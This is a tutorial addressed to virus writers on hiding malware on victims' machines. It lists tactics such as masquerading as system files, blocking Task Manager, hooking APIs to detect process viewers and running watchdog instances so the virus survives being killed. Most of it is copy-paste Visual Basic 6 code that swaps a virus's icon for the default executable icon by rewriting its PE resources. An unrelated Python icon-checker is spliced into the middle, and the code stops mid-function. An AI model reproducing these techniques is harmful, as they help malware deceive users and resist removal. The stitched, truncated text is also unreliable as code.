
Implementing Stealth Techniques in Viruses

$> A few Words...
The author is not responsible for any loss caused by the use of this article (Use at Your Own Risk).

$> Start...
Some (or perhaps all) Vx3rs (virus writers) will have run into the problem of making their virus hard to delete, or of minimising its detection by the user or by an antivirus.
So how do Vx3rs hide their viruses on the victim's computer? There are several classic and very common approaches, such as:
1. Renaming the virus file to (resemble) a Windows system file, e.g. RunDll32.exe, Winsys32.exe, etc.
2. Placing the virus file in a hidden folder or in the Windows system folder.
3. Blocking access to Task Manager and to other tools that can display running processes. This is common, since the virus wants to stay alive.
4. Using a random file name.
5. Using a familiar icon such as MS-Word, a folder, a setup program, etc.
6. Blocking the Search facility.
7. And others.
So what are the weaknesses? Using a familiar icon is a fatal one, because the user can tell the default *.Exe icon apart from the icon the virus uses. For example, if the virus uses the MS-Word icon something looks off: "A Word icon, but the extension is Exe?".

Another example is the use of random file names. Here the random name has to be stored somewhere, because when the virus trigger runs it looks for that file. The storage is either a file or a registry key. Both storage techniques are equally good if they are combined with encryption. In one virus I found and analysed, Kangen.E used a random name stored in a *.sys file, and that file was left as it was, with no protection of its contents at all. That makes tracing the name of the virus trigger easy.
So what steps should be taken so that our virus is not easily traced by the user? In my view there are a few very important points:
1. Replace the icon directly (extract and replace), rather than relying on the default icon.
2. Change the file time, file date and size of the virus file so that it is not easily found with Search.
3. Use API hooks to detect process-viewer tools; don't rely on the window caption, because there are now many tools that do not use a window caption.
4. If possible, don't launch the virus instance with "shell", since that makes the virus processes parent and child: if the parent dies, the child dies with it.
5. Always use another virus instance to watch for the other's presence (anti-kill process), so the virus can keep existing.
$> How to...?
I used Visual Basic 6.0 to try out stealth techniques that are (in my opinion) fairly good, together with several source-code references and articles from the Internet.
I also tried this technique on the Diary.Exe virus (v1.3-1.5) with some changes.
1. Icon replacement
If you have ever come across software that extracts or replaces (or both) the icon of a file, then more or less the same thing can be implemented in a virus :D. An example algorithm:
START EXECUTION
|
Copy myself.exe to destination path
|
Search for the file whose icon will be extracted
|
Extract the icon, save to destination path
|
Change myself.exe's icon to the extracted icon file (*.Ico)
|
Delete the icon file once it is no longer needed
|
END EXECUTION
I use Shell32.Dll as the file whose icon is extracted; in this case I pick the default *.exe icon (the white-blue box one :P). The source code looks roughly like this:

(A PictureBox object is required on the Form)
---------------------------- Cut here & Start Copy-Paste from here -------------------------
Sub cariikon(pathcari As String, pathekstrak As String, jenisikon As String, pic2 As PictureBox)
    ' Scans pathcari for DIB headers matching the "(" & rs byte pattern and
    ' writes the match at index jenisikon to pathekstrak\Ikon.ico
    Dim poin As Long
    poin = 1
    Dim i As Long
    Dim buf(1000) As Double
    Dim jum As Integer
    jum = 0
    Dim jikon As Long
    jikon = 0
    Dim init As String
    ' 22-byte ICONDIR + ICONDIRENTRY header prepended to the extracted DIB
    init = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
    Dim strbaca As String
    strbaca = Space(2238)
    Dim fildat As String
    Dim new_dic As String
    Dim rs As String
    ' "(" & rs is the start of a BITMAPINFOHEADER: biSize=40, biWidth=32, biHeight=64
    rs = Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
    Dim buff As Double
    buff = 1024 ^ 2
    Open pathcari For Binary As #1
    If LOF(1) > buff Then
        fildat = Space(buff)
    Else
        fildat = Space(LOF(1))
    End If
balik:
    If poin > LOF(1) Then
        GoTo tulis
    End If
    Get #1, poin, fildat
    i = 1
carilagi:
    DoEvents
    i = InStr(i + 1, fildat, "(" & rs)
    If i > 0 Then
        'lst.Add "#" & lst.Count & "#", i + poin - 1
        buf(jum) = i + poin - 1
        jum = jum + 1
    End If
    If i + Len(rs) > buff Or i = 0 Then
        poin = poin + buff - Len("(" & rs) - 1
        GoTo balik
    Else
        GoTo carilagi
    End If
tulis:
    Close
    Open pathcari For Binary As #1
    For poin = 0 To jum - 1
        DoEvents
        If Right(pathekstrak, 1) <> "\" Then
            pathekstrak = pathekstrak & "\"
        End If
        If poin <> jenisikon Then GoTo lsg
        Open pathekstrak & "Ikon.ico" For Output As #2: Close #2
        Open pathekstrak & "Ikon.ico" For Binary As #2
        'i = lst.Item("#" & poin & "#")
        i = buf(poin)
        Get #1, i, strbaca
        Put #2, 1, init & strbaca & Chr$(255)
        Close #2
        ' Delete the result if it does not load as a picture
        If ikon(pathekstrak & "Ikon.ico", pic2) = 0 Then
            Kill pathekstrak & "Ikon.ico"
        End If
        DoEvents
lsg:
    Next poin
    Close #1
    Close
End Sub

' Returns 1 if the file at path loads as a picture, 0 otherwise
Function ikon(path As String, pic As PictureBox) As Long
    On Error GoTo ero
    pic.Picture = LoadPicture(path)
    ikon = 1
    Exit Function
ero:
    ikon = 0
    Exit Function
End Function
---------------------------- Cut here & Start Copy-Paste from here -------------------------
The cariikon procedure searches the file whose icon is to be extracted by that icon's index. The resulting icon is still 16X16, but that is enough to fool the user. Note that the icon index of the *.Exe file icon in shell32.Dll differs between Windows versions, especially between Windows 9x and Windows 2k/2003/XP/NT.
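As an added check on what that routine produces (my own Python, not the article's code or its references), the following parses the ICONDIR, ICONDIRENTRY and BITMAPINFOHEADER of a single-image .ico and reports inconsistencies such as a directory entry whose size or dimensions disagree with the DIB behind it. The 22-byte header is the one cariikon builds in `init`; the DIB bodies are constructed.

```python
"""Sanity-check a single-image Windows .ico blob: ICONDIR + ICONDIRENTRY +
BITMAPINFOHEADER. Added for this page; not code from the article or its
references. Sample input is constructed below."""
import struct
from dataclasses import dataclass, field

ICONDIR = "<HHH"            # idReserved, idType, idCount
ICONDIRENTRY = "<BBBBHHII"  # bWidth, bHeight, bColorCount, bReserved,
                            # wPlanes, wBitCount, dwBytesInRes, dwImageOffset
BMIH = "<IiiHHIIiiII"       # biSize, biWidth, biHeight, biPlanes, biBitCount,
                            # biCompression, biSizeImage, X/YPelsPerMeter,
                            # biClrUsed, biClrImportant


@dataclass
class IcoReport:
    width: int
    height: int
    bit_count: int
    bytes_in_res: int
    problems: list = field(default_factory=list)


def expected_dib_size(width, height, bit_count):
    """Bytes a BMP-style icon image occupies: 40-byte header, palette (for
    <= 8 bpp), XOR mask and 1-bpp AND mask, rows padded to 4 bytes."""
    palette = 4 * (1 << bit_count) if bit_count <= 8 else 0
    xor_stride = ((width * bit_count + 31) // 32) * 4
    and_stride = ((width + 31) // 32) * 4
    return 40 + palette + (xor_stride + and_stride) * height


def parse_ico(data):
    """Parse the first image of an .ico blob and list inconsistencies."""
    if len(data) < 22:
        raise ValueError("too short for ICONDIR + one ICONDIRENTRY")
    reserved, ico_type, count = struct.unpack_from(ICONDIR, data, 0)
    w, h, _colors, _rsv, _planes, bits, size, off = struct.unpack_from(ICONDIRENTRY, data, 6)
    w, h = w or 256, h or 256  # 0 in the directory entry means 256
    rep = IcoReport(w, h, bits, size)
    if reserved != 0 or ico_type != 1 or count < 1:
        rep.problems.append("ICONDIR header is not a valid icon directory")
    if off + 40 > len(data):
        rep.problems.append("dwImageOffset points outside the blob")
        return rep
    bi_size, bi_w, bi_h, _pl, bi_bits, comp = struct.unpack_from(BMIH, data, off)[:6]
    if bi_size != 40 or comp != 0:
        rep.problems.append("image is not an uncompressed BITMAPINFOHEADER DIB")
        return rep
    rep.bit_count = bi_bits  # the DIB, not the directory entry, is authoritative
    if bi_w != w or bi_h != 2 * h:
        rep.problems.append(f"entry says {w}x{h}, DIB says {bi_w}x{bi_h // 2}")
    want = expected_dib_size(bi_w, bi_h // 2, bi_bits)
    if size != want:
        rep.problems.append(f"dwBytesInRes={size} but a {bi_w}x{bi_h // 2}x{bi_bits} DIB needs {want}")
    if off + size > len(data):
        rep.problems.append("dwBytesInRes runs past the end of the blob")
    return rep


# The 22-byte header the article's cariikon routine prepends ("init"):
# ICONDIR(0, 1, 1) + ICONDIRENTRY(32, 32, 0, 0, 0, 0, 0x8A8, 22).
PAGE_INIT_HEADER = bytes([0, 0, 1, 0, 1, 0, 32, 32, 0, 0, 0, 0, 0, 0,
                          0xA8, 0x08, 0, 0, 22, 0, 0, 0])


def constructed_dib(width, height, bit_count):
    """Constructed sample: a zero-filled DIB of the given geometry."""
    body = expected_dib_size(width, height, bit_count) - 40
    hdr = struct.pack(BMIH, 40, width, 2 * height, 1, bit_count, 0, body, 0, 0, 0, 0)
    return hdr + bytes(body)


if __name__ == "__main__":
    print(parse_ico(PAGE_INIT_HEADER + constructed_dib(32, 32, 8)))
    print(parse_ico(PAGE_INIT_HEADER + constructed_dib(16, 16, 4)).problems)
```

The header's dwBytesInRes of 0x8A8 (2216) is exactly a 32x32, 8-bit DIB, so it agrees only with payloads of that geometry; anything else is reported.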
So how do we swap or change our virus's icon with the extracted icon file?

(Source code reference from the Internet, Author: Naveed, neenojee@hotmail.com)
1st. Module:
---------------------------- Cut here & Start Copy-Paste from here -------------------------
Option Explicit

' First 24 bytes of a BITMAPINFOHEADER as stored in an RT_ICON resource
Type DIB_HEADER
    Size As Long
    Width As Long
    Height As Long
    Planes As Integer
    Bitcount As Integer
    Reserved As Long
    ImageSize As Long
End Type

' ICONDIRENTRY of an .ico file (16 bytes)
Type ICON_DIR_ENTRY
    bWidth As Byte
    bHeight As Byte
    bColorCount As Byte
    bReserved As Byte
    wPlanes As Integer
    wBitCount As Integer
    dwBytesInRes As Long
    dwImageOffset As Long
End Type

' ICONDIR of an .ico file (6 bytes)
Type ICON_DIR
    Reserved As Integer
    Type As Integer
    Count As Integer
End Type

Type DIB_BITS
    Bits() As Byte
End Type

Public Enum Errors
    FILE_CREATE_FAILED = 1000
    FILE_READ_FAILED
    INVALID_PE_SIGNATURE
    INVALID_ICO
    NO_RESOURCE_TREE
    NO_ICON_BRANCH
    CANT_HACK_HEADERS
End Enum

Public Function ReplaceIcons(Source As String, Dest As String) As Long
    Dim IcoDir As ICON_DIR
    Dim IcoDirEntry As ICON_DIR_ENTRY
    Dim tBits As DIB_BITS
    Dim Icons() As IconDescriptor
    Dim lngRet As Long
    Dim BytesRead As Long
    Dim hSource As Long
    Dim hDest As Long
    Dim ResTree As Long

    hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0)
    If hSource >= 0 Then
        If Valid_ICO(hSource) Then
            ' Read the first directory entry and the image bits it points to
            SetFilePointer hSource, 0, 0, 0
            ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0&
            ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0&
            SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0
            ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte
            ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0&
            CloseHandle hSource
            hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0, ByVal 0)
            If hDest >= 0 Then
                If Valid_PE(hDest) Then
                    ResTree = GetResTreeOffset(hDest)
                    If ResTree > 308 Then ' Sanity check
                        lngRet = GetIconOffsets(hDest, ResTree, Icons)
                        ' Overwrite the first RT_ICON image in place
                        SetFilePointer hDest, Icons(1).Offset, 0, 0
                        WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0&
                    Else
                        CloseHandle hDest
                    End If
                Else
                    CloseHandle hDest
                End If
                CloseHandle hDest
            End If
        Else
            CloseHandle hSource
        End If
    End If
    ReplaceIcons = 0
    Exit Function
End Function

Public Function Valid_ICO(hfile As Long) As Boolean
    Dim tDir As ICON_DIR
    Dim BytesRead As Long
    If (hfile > 0) Then
        ReadFile hfile, tDir, Len(tDir), BytesRead, ByVal 0&
        If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then
            Valid_ICO = True
        Else
            Valid_ICO = False
        End If
    Else
        Valid_ICO = False
    End If
End Function
---------------------------- Cut here & Start Copy-Paste from here -------------------------
2nd. Module
---------------------------- Cut here & Start Copy-Paste from here -------------------------
Option Explicit

Public Type IMAGE_DOS_HEADER
    Magic As Integer
    cblp As Integer
    cp As Integer
    crlc As Integer
    cparhdr As Integer
    minalloc As Integer
    maxalloc As Integer
    ss As Integer
    sp As Integer
    csum As Integer
    ip As Integer
    cs As Integer
    lfarlc As Integer
    ovno As Integer
    res(3) As Integer
    oemid As Integer
    oeminfo As Integer
    res2(9) As Integer
    lfanew As Long
End Type

Public Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type

Public Type IMAGE_DATA_DIRECTORY
    DataRVA As Long
    DataSize As Long
End Type

Public Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkVer As Byte
    MinorLinkVer As Byte
    CodeSize As Long
    InitDataSize As Long
    unInitDataSize As Long
    EntryPoint As Long
    CodeBase As Long
    DataBase As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOSVer As Integer
    MinorOSVer As Integer
    MajorImageVer As Integer
    MinorImageVer As Integer
    MajorSSVer As Integer
    MinorSSVer As Integer
    Win32Ver As Long
    ImageSize As Long
    HeaderSize As Long
    Checksum As Long
    Subsystem As Integer
    DLLChars As Integer
    StackRes As Long
    StackCommit As Long
    HeapReserve As Long
    HeapCommit As Long
    LoaderFlags As Long
    RVAsAndSizes As Long
    DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type

Public Type IMAGE_SECTION_HEADER
    SectionName(7) As Byte
    Address As Long
    VirtualAddress As Long
    SizeOfData As Long
    PData As Long
    PReloc As Long
    PLineNums As Long
    RelocCount As Integer
    LineCount As Integer
    Characteristics As Long
End Type

Type IMAGE_RESOURCE_DIR
    Characteristics As Long
    TimeStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    NamedEntries As Integer
    IDEntries As Integer
End Type

Type RESOURCE_DIR_ENTRY
    Name As Long
    Offset As Long
End Type

Type RESOURCE_DATA_ENTRY
    Offset As Long
    Size As Long
    CodePage As Long
    Reserved As Long
End Type

Public Type IconDescriptor
    ID As Long
    Offset As Long
    Size As Long
End Type

Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private SectionAlignment As Long
Private FileAlignment As Long
Private ResSectionRVA As Long
Private ResSectionOffset As Long

Public Function Valid_PE(hfile As Long) As Boolean
    Dim Buffer(12) As Byte
    Dim lngBytesRead As Long
    Dim tDosHeader As IMAGE_DOS_HEADER
    If (hfile > 0) Then
        ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0&
        CopyMemory Buffer(0), tDosHeader.Magic, 2
        If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then
            SetFilePointer hfile, tDosHeader.lfanew, 0, 0
            ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
            If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And (Buffer(3) = 0) Then
                Valid_PE = True
                Exit Function
            End If
        End If
    End If
    Valid_PE = False
End Function

Public Function GetResTreeOffset(hfile As Long) As Long
    On Error GoTo ErrHandler
    Dim tDos As IMAGE_DOS_HEADER
    Dim tFile As IMAGE_FILE_HEADER
    Dim tOptional As IMAGE_OPTIONAL_HEADER
    Dim tSections() As IMAGE_SECTION_HEADER
    Dim BytesRead As Long
    Dim intC As Integer
    Dim TreeFound As Boolean

    TreeFound = False
    If (hfile > 0) Then
        SetFilePointer hfile, 0, 0, 0
        ' Get the offset of the Image File Header
        ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0&
        SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
        ' Get the Image File Header and the Image Optional Header
        ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0&
        ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
        ' Get section headers
        ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER
        ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections, BytesRead, ByVal 0&
        ' Make sure there is a resource tree in this file
        If (tOptional.DataEntries(2).DataSize) Then
            ' Save section alignment and file alignment of image
            SectionAlignment = tOptional.SectionAlignment
            FileAlignment = tOptional.FileAlignment
            ' Determine which section contains the resource tree
            For intC = 0 To UBound(tSections)
                If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _
                   And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) > tOptional.DataEntries(2).DataRVA) Then
                    TreeFound = True
                    ' Save RVA and offset of resource section for future calculations
                    ResSectionRVA = tSections(intC).VirtualAddress
                    ResSectionOffset = tSections(intC).PData
                    ' Calculate the physical file offset of the resource tree
                    GetResTreeOffset = tSections(intC).PData + (tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress)
                    Exit For
                End If
            Next intC
            If Not TreeFound Then GetResTreeOffset = -1
        Else
            GetResTreeOffset = -1
        End If
    Else
        GetResTreeOffset = -1
    End If
    Exit Function
ErrHandler:
End Function

Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As IconDescriptor) As Long
    On Error GoTo ErrHandler
    Dim Root As IMAGE_RESOURCE_DIR            ' Root node of resource tree
    Dim L1Entries() As RESOURCE_DIR_ENTRY     ' 1st level of directory entries
    Dim L2Root() As IMAGE_RESOURCE_DIR        ' Level 2 resource directories
    Dim L2Entries() As RESOURCE_DIR_ENTRY     ' 2nd level of directory entries
    Dim L3Root() As IMAGE_RESOURCE_DIR        ' Level 3 resource directories
    Dim L3Entries() As RESOURCE_DIR_ENTRY     ' 3rd level of directory entries
    Dim DataEntries() As RESOURCE_DATA_ENTRY  ' Resource data entries
    Dim DIB As DIB_HEADER                     ' Descriptor for icon images
    Dim iLvl1 As Integer                      ' Loop Counter (first level)
    Dim iLvl2 As Integer                      ' Loop Counter (second level)
    Dim iLvl3 As Integer                      ' Loop Counter (third level)
    Dim Cursor As Long                        ' Temp val for setting file pointer
    Dim BytesRead As Long                     ' For ReadFile()
    Dim Count As Integer                      ' Number of icons found

    If (hfile > 0) Then
        Count = 0
        SetFilePointer hfile, ByVal TreeOffset, 0, 0
        ' Get the root node and begin navigating the resource tree
        ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
        ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
        ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
        ' Get first level child nodes
        For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
            SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0
            ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
            If L1Entries(iLvl1).Name = 3 Then ' RT_ICON
                ' Jump to level 2 and get directory
                ' Strip high-order byte from offset
                CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                Cursor = Cursor + TreeOffset
                SetFilePointer hfile, ByVal Cursor, 0, 0
                ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
                ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
                ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As RESOURCE_DIR_ENTRY
                For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
                    ' Read second level child nodes
                    CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                    Cursor = Cursor + TreeOffset
                    SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
                    ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
                    ' Jump to level 3 and get directory
                    CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                    Cursor = Cursor + TreeOffset
                    SetFilePointer hfile, ByVal Cursor, 0, 0
                    ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
                    ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
                    ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DATA_ENTRY
                    For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
                        ' Read third level child nodes
                        CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                        Cursor = Cursor + TreeOffset
                        SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0
                        ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
                        ' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure
                        SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0
                        ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
                        ' Convert RVA of IconDir structure to file offset and store
                        Count = Count + 1
                        ReDim Preserve Icons(Count) As IconDescriptor
                        Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
                        ' Store ID of icon resource
                        Icons(Count).ID = L2Entries(iLvl2).Name
                        ' Store Size of icon resource
                        SetFilePointer hfile, Icons(Count).Offset, 0, 0
                        ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0&
                        Icons(Count).Size = DIB.ImageSize + 40
                    Next iLvl3
                Next iLvl2
            End If
        Next iLvl1
    Else
        Count = 0
    End If
    ' Return the number of icons found
    GetIconOffsets = Count
    Exit Function
ErrHandler:
End Function

Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _
                                DIBAttrib As ICON_DIR_ENTRY) As Boolean
    On Error GoTo ErrHandler
    Dim Cursor As Long                        ' File pointer position
    Dim Root As IMAGE_RESOURCE_DIR            ' Root node of res tree
    Dim L1Entries() As RESOURCE_DIR_ENTRY     ' First-level child nodes
    Dim L2Root() As IMAGE_RESOURCE_DIR        ' Second-level root nodes
    Dim L2Entries() As RESOURCE_DIR_ENTRY     ' Second-level child nodes
    Dim L3Root() As IMAGE_RESOURCE_DIR        ' Third-level root nodes
    Dim L3Entries() As RESOURCE_DIR_ENTRY     ' Third-level child nodes
    Dim DataEntries() As RESOURCE_DATA_ENTRY  ' IMAGE_RESOURCE_DATA_ENTRY structs
    Dim IcoDir As ICON_DIR                    ' IconDirectory in EXE
    Dim iLvl1 As Integer                      ' Loop Counter (first level)
    Dim iLvl2 As Integer                      ' Loop Counter (second level)
    Dim iLvl3 As Integer                      ' Loop Counter (third level)
    Dim intC As Integer                       ' Loop Counter (general)
    Dim BytesRead As Long                     ' Returned by Read/WriteFile API's

    If (hfile >= 0) Then
        ' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures)
        DIBOffset = Offset_to_RVA(DIBOffset)
        SetFilePointer hfile, ByVal ResTree, 0, 0
        ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
        ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
        ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
        ' Loop through first-level child nodes and find RT_GROUP_ICON branch
        For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
            SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0
            ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
            If L1Entries(iLvl1).Name = &HE Then
                ' RT_GROUP_ICON branch found
                CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                Cursor = Cursor + ResTree
                SetFilePointer hfile, Cursor, 0, 0
                ' Read second-level directory
                ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
                ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As RESOURCE_DIR_ENTRY
                ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
                For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
                    CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
                    ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
                    CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor, 0, 0
                    ' Read third-level directory
                    ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
                    ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
                    For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
                        ' Read third-level child nodes
                        CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                        Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
                        SetFilePointer hfile, Cursor, 0, 0
                        ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
                        ' Jump to RESOURCE_DATA_ENTRY
                        CopyMemory Cursor, L3Entries(iLvl3).Offset, 3
                        Cursor = Cursor + ResTree
                        SetFilePointer hfile, Cursor, 0, 0
                        ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY
                        ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
                        ' Jump to and read ICON_DIR structure
                        Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset)
                        SetFilePointer hfile, Cursor, 0, 0
                        ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0&
                        For intC = 1 To IcoDir.Count
                            WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0&
                            SetFilePointer hfile, 2, 0, 1
                        Next intC
                    Next iLvl3
                Next iLvl2
            ElseIf L1Entries(iLvl1).Name = 3 Then
                ' RT_ICON branch found
                CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                Cursor = Cursor + ResTree
                SetFilePointer hfile, ByVal Cursor, 0, 0
                ' Read second-level directory
                ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
                ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As RESOURCE_DIR_ENTRY
                ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
                For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
                    CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
                    ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
                    CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                    Cursor = Cursor + ResTree
                    SetFilePointer hfile, Cursor, 0, 0
                    ' Read third-level directory
                    ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
                    ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DIR_ENTRY
                    For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
                        ' Read third-level child nodes
                        CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
                        Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
                        SetFilePointer hfile, Cursor, 0, 0
                        ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
                        ' Jump to and hack the RESOURCE_DATA_ENTRY
                        Cursor = L3Entries(iLvl3).Offset + ResTree
                        SetFilePointer hfile, Cursor, 0, 0
                        WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
                        WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal 0&
                    Next iLvl3
                Next iLvl2
            End If
        Next iLvl1
    Else
        HackDirectories = False
        Exit Function
    End If
    HackDirectories = True
    Exit Function
ErrHandler:
End Function

Private Function RVA_to_Offset(RVA As Long) As Long
    On Error GoTo ErrHandler
    Dim TempOffset As Long ' Difference of RVA and start of section
    TempOffset = RVA - ResSectionRVA
    If (TempOffset >= 0) Then
        ' Calculate the file offset of the RVA
        RVA_to_Offset = ResSectionOffset + TempOffset
    Else
        RVA_to_Offset = -1
    End If
    Exit Function
ErrHandler:
End Function

Private Function Offset_to_RVA(Offset As Long) As Long
    On Error GoTo ErrHandler
